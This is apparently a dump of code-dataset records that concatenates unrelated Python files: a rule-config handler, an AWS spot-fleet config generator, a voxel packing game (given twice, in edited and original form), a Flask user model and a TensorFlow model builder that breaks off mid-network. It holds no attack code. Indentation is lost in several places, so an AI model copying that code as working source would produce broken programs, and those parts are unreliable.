if rule.name == name:
isPresent = True
if not isPresent:
rule = Rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client)
rules_handler.add_rule(rule)
logging.debug("Added rule " + name)
else:
logging.error('Tried to add rule with name ' + name + ' but a rule with the same name already exists, aborting...')
class ConfigHandler(object):
    """Thread-safe accessor for the JSON config file holding 'regexs' and 'rules'."""
    def __init__(self):
        self.file_name = "core/config.json"
        self.lock = Lock()
    def _read(self):
        # The with-blocks release the lock and close the file even if load()
        # raises, which a bare acquire()/release() pair does not guarantee.
        with self.lock:
            with open(self.file_name, 'r') as f:
                return load(f)
    def _write_back(self, data, f):
        f.seek(0)
        dump(data, f, indent=4)
        f.truncate()
    def get_config(self):
        return self._read()
    def has_regex(self, name):
        return name in self._read()['regexs']
    def add_regex(self, name, regex):
        with self.lock:
            with open(self.file_name, 'r+') as f:
                data = load(f)
                data['regexs'][name] = regex
                self._write_back(data, f)
    def del_regex(self, name):
        with self.lock:
            with open(self.file_name, 'r+') as f:
                data = load(f)
                del data['regexs'][name]
                self._write_back(data, f)
    def get_regexs(self):
        return self._read()['regexs']
    def get_regex_by_name(self, name):
        return self._read()['regexs'][name]
    def enable_regex(self, name):
        self._set_regex_enabled(name, True)
    def disable_regex(self, name):
        self._set_regex_enabled(name, False)
    def _set_regex_enabled(self, name, enabled):
        with self.lock:
            with open(self.file_name, 'r+') as f:
                data = load(f)
                data['regexs'][name]['enabled'] = enabled
                self._write_back(data, f)
    def has_rule(self, name):
        return name in self._read()['rules']
    def add_rule(self, name, rule):
        with self.lock:
            with open(self.file_name, 'r+') as f:
                data = load(f)
                data['rules'][name] = rule
                self._write_back(data, f)
    def del_rule(self, name):
        with self.lock:
            with open(self.file_name, 'r+') as f:
                data = load(f)
                del data['rules'][name]
                self._write_back(data, f)
    def get_rules(self):
        return self._read()['rules']
    def get_rule_by_name(self, name):
        return self._read()['rules'][name]
    def enable_rule(self, name):
        self._set_rule_enabled(name, True)
    def disable_rule(self, name):
        self._set_rule_enabled(name, False)
    def _set_rule_enabled(self, name, enabled):
        with self.lock:
            with open(self.file_name, 'r+') as f:
                data = load(f)
                data['rules'][name]['enabled'] = enabled
                self._write_back(data, f)
    def is_regex(self, data):
        # A regex entry is exactly {'value': <str>, 'enabled': <bool>}.
        return (len(data) == 2 and 'value' in data and 'enabled' in data
                and isinstance(data['value'], str) and isinstance(data['enabled'], bool))
    def is_rule(self, data):
        required = ('enabled', 'name', 'regexs_yes', 'regexs_no', 'mode', 'hold', 'window', 'output_topic')
        if len(data) != 8 or not all(key in data for key in required):
            return False
        if not (isinstance(data['enabled'], bool) and isinstance(data['name'], str)
                and isinstance(data['regexs_yes'], dict) and isinstance(data['regexs_no'], dict)
                and isinstance(data['mode'], str) and isinstance(data['window'], int)
                and isinstance(data['hold'], int) and isinstance(data['output_topic'], str)):
            return False
        # Only the 'regexs_yes' values are type-checked; 'regexs_no' just has to be a dict.
        return all(isinstance(data['regexs_yes'][regex], str) for regex in data['regexs_yes'])
    def is_config(self, data):
        if len(data) != 2 or 'regexs' not in data or 'rules' not in data:
            return False
        if not (isinstance(data['regexs'], dict) and isinstance(data['rules'], dict)):
            return False
        return (all(self.is_regex(data['regexs'][regex]) for regex in data['regexs'])
                and all(self.is_rule(data['rules'][rule]) for rule in data['rules']))
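# On-disk layout implied by the validators above (illustrative names and values only):
# {
#     "regexs": {
#         "my_regex": {"value": "some pattern", "enabled": true}
#     },
#     "rules": {
#         "my_rule": {"enabled": true, "name": "my_rule",
#                     "regexs_yes": {}, "regexs_no": {},
#                     "mode": "...", "hold": 0, "window": 0,
#                     "output_topic": "..."}
#     }
# }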
mcmweb/aws_spot_fleet_helper/spot_fleet_config.py | equake/aws-spot-fleet-helper | 2 | 6616768
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import re
from base64 import b64encode
from datetime import datetime, timedelta
from string import Template
from mcmweb import aws_spot_fleet_helper
BASE_PATH = os.path.dirname(os.path.realpath(aws_spot_fleet_helper.__file__))
DEFAULT_FLEET_ROLE = 'aws-ec2-spot-fleet-role'
INSTANCE_WEIGHT = {
'nano': 1,
'micro': 1,
'small': 1,
'medium': 1,
'large': 2,
'xlarge': 4,
'2xlarge': 8,
'4xlarge': 16,
'8xlarge': 36,
'10xlarge': 40
}
FLEET_ROLE_ARN = 'arn:aws:iam::%(_account_id)i:role/%(_fleet_role)s'
INSTANCE_PROFILE_ARN = 'arn:aws:iam::%(_account_id)i:instance-profile/%(_iam_role)s'
PATTERN_AMI_ID = re.compile('^ami-[0-9a-f]{8,}$')
PATTERN_INSTANCE_TYPE = re.compile(r'^[a-z]+[0-9]+\.([0-9]+)?(nano|micro|small|medium|large|xlarge)$')
PATTERN_SECURITY_GROUP_ID = re.compile('^sg-[0-9a-f]{8,}$')
PATTERN_SUBNET_ID = re.compile('^subnet-[0-9a-f]{8,}$')
class SpotFleetConfig(object):
    _monitoring = True
    _target_capacity = 1
    _user_data = None
    def __init__(self, account_id, bid_value, ssh_key_name, ami_id, iam_role, tags=None, assign_public_ip=None, fleet_role=DEFAULT_FLEET_ROLE):
        """
        SpotFleet
        Generate the LaunchSpecification JSON config file for deploying spot fleets
        :param account_id: AWS account id
        :param bid_value: Maximum bid value per VCPU in USD
        :param ssh_key_name: SSH key name to be used
        :param ami_id: Amazon Machine Image id to deploy
        :param iam_role: Instance IAM role
        :param assign_public_ip: Assign public ip to launched instances
        :param fleet_role: IAM role used to deploy assets
        """
        # The lists are created per instance; defining them as class attributes
        # would share one mutable list across every SpotFleetConfig object.
        self._instance_types = []
        self._security_groups = []
        self._subnet_ids = []
        self._account_id = int(account_id)
        self._bid_value = bid_value
        self._ssh_key_name = ssh_key_name
        self._ami_id = ami_id
        self._iam_role = iam_role
        self._assign_public_ip = assign_public_ip
        self._fleet_role = fleet_role
        self._tags = self.__parse_tags(tags)
    @staticmethod
    def __parse_tags(tags):
        if not tags:
            return {}
        if isinstance(tags, list):
            # Each entry is a 'key=value' string; parse the argument itself
            # rather than reaching for the CLI-level 'args' global.
            return {key.strip(): value.strip() for key, value in [tag.strip().split('=') for tag in tags]}
        elif isinstance(tags, dict):
            return tags
        else:
            raise ValidationException('Unknown tag format: %s' % tags)
@staticmethod
def __instance_weight(instance_type_name):
""" Infer instance weight/cpu count based on instance type name """
size = instance_type_name.rsplit('.', 1)[1]
weight = INSTANCE_WEIGHT.get(size)
if not weight:
raise ValidationException('Invalid instance type: %s' % instance_type_name)
return weight
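    # Example: 'c3.4xlarge' -> size '4xlarge' -> weight 16; 'm3.medium' -> weight 1
    # (see INSTANCE_WEIGHT above).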
def _build_base_object(self):
        # ValidFrom/ValidUntil below are suffixed with 'Z', so use UTC here.
        now = datetime.utcnow()
return {
'AllocationStrategy': 'lowestPrice',
'IamFleetRole': FLEET_ROLE_ARN % self.__dict__,
'SpotPrice': str(self._bid_value),
'TargetCapacity': self._target_capacity,
'TerminateInstancesWithExpiration': True,
'Type': 'maintain',
'ValidFrom': now.isoformat().split('.')[0] + 'Z',
'ValidUntil': (now + timedelta(weeks=520)).isoformat().split('.')[0] + 'Z',
'LaunchSpecifications': []
}
    def _build_security_groups_object(self):
        if not self._security_groups:
            raise ValidationException('Please provide at least one security_group')
        return list(self._security_groups)
def _build_launch_specs_object(self):
if not self._instance_types:
raise ValidationException('Please provide at least one instance_type')
if not self._subnet_ids:
raise ValidationException('Please provide at least one subnet_id')
sg_config = self._build_security_groups_object()
encoded_user_data = None
if self._tags or self._user_data:
with open(os.path.join(BASE_PATH, 'spot_fleet_tagger.py'), 'r') as f_tmpl:
raw_template = f_tmpl.read()
template = Template(raw_template)
template_data = {'tags': '', 'original_script': ''}
if self._tags:
template_data['tags'] = json.dumps(self._tags)
if self._user_data:
template_data['original_script'] = self._user_data
            # Template.substitute returns str; b64encode needs bytes on Python 3,
            # so encode before and decode after to keep a str for 'UserData'.
            encoded_user_data = b64encode(template.substitute(template_data).encode()).decode()
for it in self._instance_types:
for sid in self._subnet_ids:
spec = {
'ImageId': self._ami_id,
'InstanceType': it,
'KeyName': self._ssh_key_name,
'WeightedCapacity': self.__instance_weight(it),
'Monitoring': {'Enabled': bool(self._monitoring)},
'IamInstanceProfile': {'Arn': INSTANCE_PROFILE_ARN % self.__dict__},
'NetworkInterfaces': [{
'DeviceIndex': 0,
'Groups': sg_config,
'SubnetId': sid
}]
}
if self._assign_public_ip is not None:
spec['NetworkInterfaces'][0]['AssociatePublicIpAddress'] = bool(self._assign_public_ip)
if encoded_user_data:
spec['UserData'] = encoded_user_data
yield spec
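    # One LaunchSpecification is emitted per (instance type, subnet) pair; with
    # AllocationStrategy 'lowestPrice' the fleet picks the cheapest viable combination.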
def add_instance_type(self, instance_type):
if not PATTERN_INSTANCE_TYPE.match(instance_type):
raise ValidationException('Invalid instance type "%s"' % instance_type)
self._instance_types.append(instance_type)
def add_security_group_id(self, security_group):
if not PATTERN_SECURITY_GROUP_ID.match(security_group):
raise ValidationException('Invalid security group "%s"' % security_group)
self._security_groups.append(security_group)
def add_subnet_id(self, subnet_id):
if not PATTERN_SUBNET_ID.match(subnet_id):
raise ValidationException('Invalid subnet "%s"' % subnet_id)
self._subnet_ids.append(subnet_id)
def should_assign_public_ip(self, public_ip):
self._assign_public_ip = bool(public_ip)
def set_user_data(self, user_data):
if not user_data:
return
self._user_data = user_data
def generate(self):
"""
        Build a configuration object
:rtype: dict
"""
fleet_config = self._build_base_object()
fleet_config['LaunchSpecifications'] = list(self._build_launch_specs_object())
return fleet_config
def __str__(self):
"""
Full json output!
:rtype: str
"""
return json.dumps(self.generate(), indent=2)
class ValidationException(Exception):
pass
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='Tool to launch a fleet of Spot instances within AWS infrastructure')
parser.add_argument('account_id', metavar='account-id', type=int, help='AWS account id')
parser.add_argument('-bid-value', type=float, required=True, help='Maximum bid value per VCPU in USD')
parser.add_argument('-ssh-key-name', type=str, required=True, help='SSH key name to be used')
parser.add_argument('-ami-id', type=str, required=True, help='Amazon Machine Image id to deploy')
parser.add_argument('-iam-role', type=str, required=True, help='Instance IAM role')
parser.add_argument('-instance-type', type=str, required=True, nargs='+', help='Instance types to deploy (ex: c3.4xlarge, m3.medium)')
parser.add_argument('-security-group', type=str, required=True, nargs='+', help='Security Group ids to deploy')
parser.add_argument('-subnet-id', type=str, required=True, nargs='+', help='Subnet ids to deploy')
    # type=bool would treat any non-empty string (including 'False') as True;
    # store_true with default=None keeps the "not specified" case distinct.
    parser.add_argument('--assign-public-ip', action='store_true', default=None, help='Assign public ip to launched instances')
parser.add_argument('--fleet-role', type=str, default=DEFAULT_FLEET_ROLE, help='IAM role used to deploy assets (default: %s)' % DEFAULT_FLEET_ROLE)
parser.add_argument('--tags', type=str, nargs='+', help='AMI tags. Format: "key=value"')
parser.add_argument('--user-data', type=str, help='User data to be included in instance launch configuration. File name or "-" for reading from stdin')
args = parser.parse_args()
config = SpotFleetConfig(args.account_id, args.bid_value, args.ssh_key_name, args.ami_id, args.iam_role, args.tags, args.assign_public_ip, args.fleet_role)
try:
for arg_instance_type in args.instance_type:
config.add_instance_type(arg_instance_type)
for arg_security_group in args.security_group:
config.add_security_group_id(arg_security_group)
for arg_subnet_id in args.subnet_id:
config.add_subnet_id(arg_subnet_id)
if args.user_data:
user_data = ''
if args.user_data == '-':
for line in sys.stdin:
user_data += line
else:
with open(args.user_data, 'r') as user_data_file:
                    user_data += user_data_file.read()  # consume the whole file
config.set_user_data(user_data)
print(config)
sys.exit(0)
except Exception as e:
print('%s: %s' % (e.__class__.__name__, str(e)), file=sys.stderr)
print('Please verify if all of your parameters are right!', file=sys.stderr)
        sys.exit(100)
voxel/VoxelGame.py | vincentlooi/alpha_zero | 0 | 6616769
from __future__ import print_function
import sys
sys.path.append('..')
# from Game import Game
# from .TetrisLogic import Board, BoardRenderer
from VoxelLogic import Board
import numpy as np
import random
class VoxelGame(object):
def __init__(self,x,y,z,n):
self.x = x
self.y = y
self.z = z
self.n = n
self.board = Board(x,y,z,n)
def getInitBoard(self):
# return initial board (numpy board)
self.board.reset()
return self.board
def getBoardSize(self):
return (self.board.len_z, self.board.len_y, self.board.len_x)
def getActionSize(self):
# return number of actions
# return self.n*self.n + 1
# box_list_cnt = len(getInitBoxList())
# board_sz = np.size(getInitBoard())
# return board_sz * box_list_cnt + 1
return self.board.total_actions + 1 # + 1 for end game action
def boardIndexToSquare(self, idx):
return self.board.boardIndexToSquare(idx)
    def getNextState(self, board_obj, action):
        # if player takes action on board, return next (board,player)
        # action must be a valid move
        if action == self.getActionSize() - 1:
            # The last action index is the "pass / game over" slot that
            # getValidMoves marks via valids[-1], so the board is unchanged.
            return board_obj
        b = board_obj
        b.execute_move(action)
        return b
def getValidMoves(self, board_obj):
# return a fixed size binary vector
valids = [0] * self.getActionSize()
b = board_obj
legalMoves = b.get_legal_moves_all()
if len(legalMoves)==0:
valids[-1]=1
else:
for ix in legalMoves:
valids[ix]=1
return np.array(valids)
def getGameEnded(self, board_obj):
# return 0 if not ended, 1 if player 1 won, -1 if player 1 lost
# player = 1
return not board_obj.has_legal_moves_all()
def getScore(self, board_obj):
return board_obj.get_score()
def getCanonicalForm(self, board_obj):
# return state if player==1, else return -state if player==-1
return board_obj
def getSymmetries(self, board_obj, pi):
'''
pi is the policy output (size: total actions)
'''
# horizontal flip only
assert(len(pi) == self.getActionSize()) # 1 for pass
l = []
# for i in range(1, 5):
b = board_obj
board = board_obj.pieces
for j in [True, False]:
newB = board.copy() # np.rot90(board, i)
if j:
newB[:b.z] = np.array([np.fliplr(x) for x in b.pieces[:b.z]]) # only flip the top part!
newPi = self.flip_pi_LR(board_obj, pi)
newPi = list(newPi) + [pi[-1]]
else:
newPi = list(pi)
l += [(newB, newPi)]
return l
def flip_pi_LR(self, board_obj, pi):
b = board_obj
n = b.n
x = b.x
y = b.y
z = b.z
total_actions = b.total_actions
assert len(pi) >= total_actions == x * y * z * n
newPi_m = np.reshape(np.array(pi)[:total_actions], (n, z, y, x))
for box_ix, mask in enumerate(newPi_m):
# newPi = np.array([np.fliplr(pi_) for pi_ in newPi]) # CHECK IT!
box_w,_,_ = b.get_box_size_from_idx(box_ix)
if box_w == 0:
continue
mask = np.array([np.fliplr(m) for m in mask])
shift_x = box_w - 1 # shift to the left
mask[:,:,:x-shift_x] = mask[:,:,shift_x:]
mask[:,:,x-shift_x:] = 0
newPi_m[box_ix] = mask
return newPi_m.ravel()
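    # Flip-then-shift: np.fliplr maps column x0 to x - 1 - x0, but a box of
    # width box_w is anchored at its left edge, so the mirrored anchor must be
    # (x - 1 - x0) - (box_w - 1). Shifting each mask left by box_w - 1 applies
    # exactly that anchor correction.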
    def stringRepresentation(self, board_obj):
        # serialize the z*y*x board to bytes for use as a dict key
        # (tostring() is the legacy numpy alias of tobytes())
        return board_obj.pieces.tostring()
if __name__ == '__main__':
import copy
n = 5
x = 6
y = 4
z = 3
b = Board(x, y, z, n)
g = VoxelGame(x, y, z, n)
from VoxelRender import BoardRenderer
b_renderer = BoardRenderer(name='Normal')
b_renderer2 = BoardRenderer(name='Flipped')
flipped_b = copy.deepcopy(b)
while not g.getGameEnded(b):
valid_actions = g.getValidMoves(b)
if valid_actions[-1] == 1:
print("NO MORE VALID ACTIONS")
break
valid_action_idx = np.where(valid_actions==1)[0]
rand_action = random.choice(valid_action_idx)
rand_action_onehot = np.zeros(len(valid_actions))
rand_action_onehot[rand_action] = 1
rand_action_onehot_flipped = g.flip_pi_LR(flipped_b, rand_action_onehot)
rand_action_flipped = np.where(rand_action_onehot_flipped==1)[0][0]
b_renderer.draw_action(b, rand_action)
b_renderer2.draw_action(flipped_b, rand_action_flipped)
b_renderer.show(1)
b = g.getNextState(b, rand_action)
flipped_b = g.getNextState(flipped_b, rand_action_flipped)
b_renderer.display_board(b)
b_renderer2.display_board(flipped_b)
b_renderer.show(1)
print("Occupied cells: %d of available %d, Score: %.3f"%(b.get_occupied_count(), min(b.box_list_area, x * y * z), b.get_score())) | from __future__ import print_function
import sys
sys.path.append('..')
# from Game import Game
# from .TetrisLogic import Board, BoardRenderer
from VoxelLogic import Board
import numpy as np
import random
class VoxelGame(object):
def __init__(self,x,y,z,n):
self.x = x
self.y = y
self.z = z
self.n = n
self.board = Board(x,y,z,n)
def getInitBoard(self):
# return initial board (numpy board)
self.board.reset()
return self.board
def getBoardSize(self):
return (self.board.len_z, self.board.len_y, self.board.len_x)
def getActionSize(self):
# return number of actions
# return self.n*self.n + 1
# box_list_cnt = len(getInitBoxList())
# board_sz = np.size(getInitBoard())
# return board_sz * box_list_cnt + 1
return self.board.total_actions + 1 # + 1 for end game action
def boardIndexToSquare(self, idx):
return self.board.boardIndexToSquare(idx)
def getNextState(self, board_obj, action):
# if player takes action on board, return next (board,player)
# action must be a valid move
if action == self.getActionSize():
return board_obj
b = board_obj
b.execute_move(action)
return b
def getValidMoves(self, board_obj):
# return a fixed size binary vector
valids = [0] * self.getActionSize()
b = board_obj
legalMoves = b.get_legal_moves_all()
if len(legalMoves)==0:
valids[-1]=1
else:
for ix in legalMoves:
valids[ix]=1
return np.array(valids)
def getGameEnded(self, board_obj):
# return 0 if not ended, 1 if player 1 won, -1 if player 1 lost
# player = 1
return not board_obj.has_legal_moves_all()
def getScore(self, board_obj):
return board_obj.get_score()
def getCanonicalForm(self, board_obj):
# return state if player==1, else return -state if player==-1
return board_obj
def getSymmetries(self, board_obj, pi):
'''
pi is the policy output (size: total actions)
'''
# horizontal flip only
assert(len(pi) == self.getActionSize()) # 1 for pass
l = []
# for i in range(1, 5):
b = board_obj
board = board_obj.pieces
for j in [True, False]:
newB = board.copy() # np.rot90(board, i)
if j:
newB[:b.z] = np.array([np.fliplr(x) for x in b.pieces[:b.z]]) # only flip the top part!
newPi = self.flip_pi_LR(board_obj, pi)
newPi = list(newPi) + [pi[-1]]
else:
newPi = list(pi)
l += [(newB, newPi)]
return l
def flip_pi_LR(self, board_obj, pi):
b = board_obj
n = b.n
x = b.x
y = b.y
z = b.z
total_actions = b.total_actions
assert len(pi) >= total_actions == x * y * z * n
newPi_m = np.reshape(np.array(pi)[:total_actions], (n, z, y, x))
for box_ix, mask in enumerate(newPi_m):
# newPi = np.array([np.fliplr(pi_) for pi_ in newPi]) # CHECK IT!
box_w,_,_ = b.get_box_size_from_idx(box_ix)
if box_w == 0:
continue
mask = np.array([np.fliplr(m) for m in mask])
shift_x = box_w - 1 # shift to the left
mask[:,:,:x-shift_x] = mask[:,:,shift_x:]
mask[:,:,x-shift_x:] = 0
newPi_m[box_ix] = mask
return newPi_m.ravel()
def stringRepresentation(self, board_obj):
# 8x8 numpy array (canonical board)
return board_obj.pieces.tostring()
if __name__ == '__main__':
import copy
n = 5
x = 6
y = 4
z = 3
b = Board(x, y, z, n)
g = VoxelGame(x, y, z, n)
from VoxelRender import BoardRenderer
b_renderer = BoardRenderer(name='Normal')
b_renderer2 = BoardRenderer(name='Flipped')
flipped_b = copy.deepcopy(b)
while not g.getGameEnded(b):
valid_actions = g.getValidMoves(b)
if valid_actions[-1] == 1:
print("NO MORE VALID ACTIONS")
break
valid_action_idx = np.where(valid_actions==1)[0]
rand_action = random.choice(valid_action_idx)
rand_action_onehot = np.zeros(len(valid_actions))
rand_action_onehot[rand_action] = 1
rand_action_onehot_flipped = g.flip_pi_LR(flipped_b, rand_action_onehot)
rand_action_flipped = np.where(rand_action_onehot_flipped==1)[0][0]
b_renderer.draw_action(b, rand_action)
b_renderer2.draw_action(flipped_b, rand_action_flipped)
b_renderer.show(1)
b = g.getNextState(b, rand_action)
flipped_b = g.getNextState(flipped_b, rand_action_flipped)
b_renderer.display_board(b)
b_renderer2.display_board(flipped_b)
b_renderer.show(1)
print("Occupied cells: %d of available %d, Score: %.3f"%(b.get_occupied_count(), min(b.box_list_area, x * y * z), b.get_score())) | en | 0.563373 | # from Game import Game # from .TetrisLogic import Board, BoardRenderer # return initial board (numpy board) # return number of actions # return self.n*self.n + 1 # box_list_cnt = len(getInitBoxList()) # board_sz = np.size(getInitBoard()) # return board_sz * box_list_cnt + 1 # + 1 for end game action # if player takes action on board, return next (board,player) # action must be a valid move # return a fixed size binary vector # return 0 if not ended, 1 if player 1 won, -1 if player 1 lost # player = 1 # return state if player==1, else return -state if player==-1 pi is the policy output (size: total actions) # horizontal flip only # 1 for pass # for i in range(1, 5): # np.rot90(board, i) # only flip the top part! # newPi = np.array([np.fliplr(pi_) for pi_ in newPi]) # CHECK IT! # shift to the left # 8x8 numpy array (canonical board) | 2.85666 | 3 |
declare_qtquick/properties/__ext__.py | likianta/declare-qtquick | 3 | 6616770
try:
from ..black_magic import proxy
from ..control import PropGetterAndSetter
from ..control import get_id_level
from ..typehint import TsProperty as T # noqa
except ImportError as e:
    raise e
auctioning_platform/customer_relationship/customer_relationship/config.py | nhdinh/smp-modulith | 299 | 6616771
from dataclasses import dataclass
from typing import Tuple
@dataclass(repr=False)
class CustomerRelationshipConfig:
email_host: str
email_port: int
email_username: str
email_password: str
email_from: Tuple[str, str]
@property
def formatted_from(self) -> str:
return f"{self.email_from[0]} <{self.email_from[1]}>"
| from dataclasses import dataclass
from typing import Tuple
@dataclass(repr=False)
class CustomerRelationshipConfig:
email_host: str
email_port: int
email_username: str
email_password: str
email_from: Tuple[str, str]
@property
def formatted_from(self) -> str:
return f"{self.email_from[0]} <{self.email_from[1]}>"
| none | 1 | 3.281964 | 3 | |
flask_tutorial_03/models/user.py | lishnih/flask_tutorial_03 | 0 | 6616772
#!/usr/bin/env python
# coding=utf-8
# Stan 2016-06-07
from __future__ import (division, absolute_import,
print_function, unicode_literals)
import os
from datetime import datetime
from ..app import app, db, bcrypt
class User(db.Model): # Rev. 2018-10-21
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String, nullable=False, unique=True)
email = db.Column(db.String, nullable=False, unique=True)
name = db.Column(db.String, nullable=False)
password = db.Column(db.String, nullable=False)
active = db.Column(db.Boolean, nullable=False, default=True)
verified = db.Column(db.String, nullable=False)
created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
updated = db.Column(db.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow)
@property
def is_anonymous(self):
return False
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return self.active
@property
def is_verified(self):
return not self.verified
def __init__(self, username, email, password=None, **kargs):
self.username = username
self.email = email
self.password = self.get_password(password) if password else '-'
for key, value in kargs.items():
if hasattr(self, key):
setattr(self, key, value)
self.verified = self.get_verification(password)
def __repr__(self):
return '<User {0!r}>'.format(self.name)
def get_id(self):
return self.email
def get_password(self, password):
pw_hash = bcrypt.generate_password_hash(password)
return pw_hash
def change_password(self, password):
self.password = self.get_password(password)
def init_env(self, send=True):
if send:
self.send_verification()
else:
self.set_verified()
def send_verification(self):
# send verification code
pass
    def get_verification(self, data):
        # Keep re-hashing until the token collides with no existing user,
        # since 'verified' doubles as the unique email-verification key.
        double = True
        while double:
            verified = bcrypt.generate_password_hash(data)
            double = User.query.filter_by(verified=verified).first()
        return verified
def set_verified(self):
self.verified = ''
def set_active(self, status = 1):
self.active = status
db.create_all()
model_builder.py | TDteach/benchmarks | 0 | 6616773
import tensorflow as tf
from models import model as model_lib
from tensorflow.python.training import moving_averages
import convnet_builder
from six.moves import xrange
import numpy as np
def load_weights(weight_file):
    if weight_file is None:
        return
    print('===Load===')
    print('loading caffe_weight_file %s' % weight_file)
    try:
        weights_dict = np.load(weight_file).item()
    except Exception:
        # Fall back for weight pickles written under Python 2.
        weights_dict = np.load(weight_file, encoding='bytes').item()
    return weights_dict
class Model_Builder(model_lib.CNNModel):
def __init__(self, model_name, num_class, options, params):
super(Model_Builder, self).__init__(model_name,
image_size=options.crop_size,
batch_size=options.batch_size,
learning_rate=options.base_lr,
params=params)
self.options = options
self.num_class = num_class
if model_name == 'resnet101':
self.__weights_dict = load_weights(options.caffe_model_path)
elif model_name == 'cifar10':
from models import resnet_model
self._resnet20 = resnet_model.create_resnet20_cifar_model(params)
elif model_name == 'cifar10_alexnet':
from models import alexnet_model
self._alexnet = alexnet_model.AlexnetCifar10Model()
elif model_name == 'resnet50':
from models import resnet_model
self._resnet50 = resnet_model.create_resnet50_model(params)
elif 'resnet101' in model_name:
from models import resnet_model
self._resnet101 = resnet_model.create_resnet101_model(params)
elif options.net_mode == 'backdoor_eva':
self.mu, self.inv_Sigma = self._read_gaussian_data(self.options.gaussian_data_file)
self.trainable = True
self.last_affine_name = None
self.backbone_savers=[]
def _read_gaussian_data(self, file_name):
from scipy.io import loadmat
in_list = loadmat(file_name)
return in_list['mu'].astype(np.float32), in_list['inv_Sigma'].astype(np.float32)
def _variable_with_constant_value(self, name, value, trainable=None):
if trainable is None:
trainable = self.trainable
var = tf.get_variable(name, value.shape, dtype=tf.float32, initializer=tf.constant_initializer(value),
trainable=trainable)
return var
def _gtsrb_inference(self, cnn):
num_conv_layers = [2, 2, 2]
assert len(num_conv_layers) == 3
for _ in xrange(num_conv_layers[0]):
cnn.conv(32, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[1]):
cnn.conv(64, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[2]):
cnn.conv(128, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
cnn.reshape([-1, 128 * 4 * 4])
cnn.affine(256)
cnn.dropout(keep_prob=0.5)
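        # The reshape to 128 * 4 * 4 assumes 32x32 inputs: three 2x2 max-pools
        # take each spatial dimension 32 -> 16 -> 8 -> 4.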
    def _vgg16_inference(self, cnn):
        """Build vgg architecture from blocks."""
        num_conv_layers = [2, 2, 3, 3, 3]
        assert len(num_conv_layers) == 5
for _ in xrange(num_conv_layers[0]):
cnn.conv(64, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[1]):
cnn.conv(128, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[2]):
cnn.conv(256, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[3]):
cnn.conv(512, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[4]):
cnn.conv(512, 3, 3)
cnn.mpool(2, 2)
cnn.reshape([-1, 512 * 4 * 4])
cnn.affine(4096)
cnn.dropout()
cnn.affine(256)
cnn.dropout()
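        # 512 * 4 * 4 likewise implies 128x128 inputs: five 2x2 max-pools take
        # each spatial dimension 128 -> 64 -> 32 -> 16 -> 8 -> 4.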
def _googlenet_inference(self, cnn):
def inception_v1(cnn, k, l, m, n, p, q):
cols = [[('conv', k, 1, 1)], [('conv', l, 1, 1), ('conv', m, 3, 3)],
[('conv', n, 1, 1), ('conv', p, 5, 5)],
[('mpool', 3, 3, 1, 1, 'SAME'), ('conv', q, 1, 1)]]
cnn.inception_module('incept_v1', cols)
cnn.conv(64, 7, 7, 2, 2)
cnn.mpool(3, 3, 2, 2, mode='SAME')
cnn.conv(64, 1, 1)
cnn.conv(192, 3, 3)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 64, 96, 128, 16, 32, 32)
inception_v1(cnn, 128, 128, 192, 32, 96, 64)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 192, 96, 208, 16, 48, 64)
inception_v1(cnn, 160, 112, 224, 24, 64, 64)
inception_v1(cnn, 128, 128, 256, 24, 64, 64)
inception_v1(cnn, 112, 144, 288, 32, 64, 64)
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
inception_v1(cnn, 384, 192, 384, 48, 128, 128)
cnn.apool(4, 4, 1, 1, mode='VALID')
cnn.reshape([-1, 1024])
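    # The unrolled _resnet101_inference below reads like converter-generated
    # code (e.g. MMdnn output for the Caffe model loaded into self.__weights_dict);
    # self.convolution and self.batch_normalization are presumably thin wrappers
    # that fetch each layer's weights from that dict by name -- they are not
    # defined in this excerpt.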
def _resnet101_inference(self, cnn):
conv1_pad = tf.pad(cnn.top_layer, paddings=[[0, 0], [3, 3], [3, 3], [0, 0]])
conv1 = self.convolution(conv1_pad, group=1, strides=[2, 2], padding='VALID', name='conv1')
bn_conv1 = self.batch_normalization(conv1, variance_epsilon=9.99999974738e-06, name='bn_conv1')
conv1_relu = tf.nn.relu(bn_conv1, name='conv1_relu')
pool1_pad = tf.pad(conv1_relu, paddings=[[0, 0], [0, 1], [0, 1], [0, 0]], constant_values=float('-Inf'))
pool1 = tf.nn.max_pool(pool1_pad, [1, 3, 3, 1], [1, 2, 2, 1], padding='VALID', name='pool1')
res2a_branch2a = self.convolution(pool1, group=1, strides=[1, 1], padding='VALID', name='res2a_branch2a')
res2a_branch1 = self.convolution(pool1, group=1, strides=[1, 1], padding='VALID', name='res2a_branch1')
bn2a_branch2a = self.batch_normalization(res2a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2a')
bn2a_branch1 = self.batch_normalization(res2a_branch1, variance_epsilon=9.99999974738e-06, name='bn2a_branch1')
res2a_branch2a_relu = tf.nn.relu(bn2a_branch2a, name='res2a_branch2a_relu')
res2a_branch2b_pad = tf.pad(res2a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2a_branch2b = self.convolution(res2a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2a_branch2b')
bn2a_branch2b = self.batch_normalization(res2a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2b')
res2a_branch2b_relu = tf.nn.relu(bn2a_branch2b, name='res2a_branch2b_relu')
